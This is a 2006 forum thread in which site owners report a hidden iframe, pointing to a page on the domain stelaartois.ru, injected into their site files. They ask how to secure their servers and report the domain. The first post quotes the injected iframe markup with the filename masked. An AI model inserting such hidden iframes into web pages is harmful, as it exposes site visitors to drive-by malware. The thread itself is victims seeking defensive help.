stelaartois.ru hacker

Discussion in 'Security' started by websiteideas, Nov 14, 2006.

  1. #1
    A friend of mine found this line inserted into one of his files: <iframe name='StatPage' src='http://stelaartois.ru/xxxxx2.php' width=5 height=5 style='display:none'></iframe>

    I've x'ed out the filename to protect anyone here from getting the nasty bug by visiting the page themselves.

    I've suggested that he contact his host to try and tie up security from the server admins side.

    What else can be done? Can this domain get shutdown somehow? How do you report this? I see that others are have been violated by this guy since over a month ago after search google for this domain name and finding a thread in another forum.
     
    websiteideas, Nov 14, 2006 IP
  2. Phynder

    Phynder Well-Known Member

    Messages:
    2,603
    Likes Received:
    145
    Best Answers:
    0
    Trophy Points:
    178
    #2
    I just logged in to ask the SAME question!

    A friend of mine found the exact same iframe inserted into the footer of his site - a custom PHP site hosted on a Linux box (I need to find out the distribution). He has a dedicated server, but it uses CPANEL. I will query him for more details about his setup - perhaps we can track down some similarities. Also, I think it happened around 13:30 EST on Thursday.

    Are there any decent security consultants here on DP?
     
    Phynder, Nov 16, 2006 IP
  3. gigapromoters

    gigapromoters Peon

    Messages:
    309
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I just tried to open this URL from my browser. It was blocked by my firewall saying its a spy site. Trying to find out more details...
     
    gigapromoters, Dec 6, 2006 IP